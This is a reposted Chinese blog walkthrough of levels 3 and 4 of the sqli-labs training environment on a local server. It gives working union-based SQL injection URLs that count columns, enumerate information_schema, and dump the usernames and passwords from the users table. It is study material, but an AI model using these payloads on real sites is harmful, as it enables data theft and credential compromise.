标签:Less sqli3 labs sqli master id schema
qli_labs第三关
1.安装phpstudy和搭建靶场环境
- 从https://github.com/Audi-1/sqli-labs下载源代码
- 搭建环境用的是phpstudy
- 编辑sqli\sql-connections\db-creds.inc文件 修改mysql链接数据库帐号密码。具体自行百度
2.修改一下第一个index.php 的代码,让我们更好理解
3.选择第三关,并在url最后面加上?id=1,出来如下界面
4.判断是否有注入(判断是否未严格校验)
- 可控参数的改变能否影响页面显示结果
2.是什么类型的注入
5.猜字段数量(使用order by 猜字段)
- http://127.0.0.1/sqli-labs/sqli-labs-master/Less-3/?id=1') order by 3--+ //结果显示正常
2. http://127.0.0.1/sqli-labs/sqli-labs-master/Less-3/?id=1') order by 4--+ //结果显示错误表示字段数量为3
6.将id=1改为一个数据库不存在的id值,如-1,使用union select 1,2,3联合查询语句查看页面是否有显示位。
- http://127.0.0.1/sqli-labs/sqli-labs-master/Less-3/?id=-1') union select 1,2,3 --+//发现页面先输出了2和3,说明有2个显示位
7.利用mysql>5.0版本的一个数据库information_schema(可以查询数据库的表,字段,数据)
- information_schema下有两个比较重要的表tables,columns(一个查表的,一个是查字段的)
2. tables表下有几个重要字段
3. columns表下有几个重要字段
8.开始注出数据
- 使用下面的句子可注出当前数据库的所有表名
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-3/index.php?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
2. 选择一个注出来的表名,通过information_schema数据库下columns表注出该表名所有字段
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-3/index.php?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'--+
3. 通过上述知道的数据库,表,字段,我们便可以注出数据
http://127.0.0.1/sqli-labs/sqli-labs-master/Less-3/index.php?id=-1') union select 1,group_concat(concat_ws(':',id,username,password)),3 from users--+
qli_labs第四关
跟第三关一样,只是第三关的单引号,第四关变成了双引号,所有我就不重复执行了
最后我总结一下:小白选手,要是啥讲错了的或者没注意到的地方欢迎大佬们斧正!
标签:Less,sqli3,labs,sqli,master,id,schema 来源: https://www.cnblogs.com/zhuifeng6/p/13026435.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。